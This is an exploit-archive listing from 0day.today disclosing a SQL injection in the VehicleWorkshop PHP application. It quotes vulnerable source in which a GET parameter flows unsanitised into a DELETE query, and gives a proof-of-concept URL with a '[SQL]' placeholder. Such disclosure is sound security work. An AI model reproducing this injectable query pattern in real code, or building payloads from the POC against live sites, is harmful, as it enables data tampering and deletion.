Lucene search
Shahab Shamsi1337DAY-ID-28208HistoryJul 30, 2017 - 12:00 a.m.
VehicleWorkshop - SQL Injection Vulnerability
2017-07-3000:00:00
Shahab Shamsi
0day.today
11
Exploit for php platform in category web applications
# Exploit Title: VehicleWorkshop SQL Injection
# Data: 07.28.2017
# Exploit Author: Shahab Shamsi
# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop
# Tested on: Windows
# Google Dork: N/A
=========
Vulnerable Page:
=========
/viewvehiclestoremore.php
==========
Vulnerable Source:
==========
Line5: if(isset($_GET['vahicleid']))
Line7: $results = mysql_query("DELETE from vehiclestore where vehicleid ='$_GET[vahicleid]'");
=========
POC:
=========
http://site.com/viewvehiclestoremore.php?vahicleid=[SQL]
# 0day.today [2018-04-11] #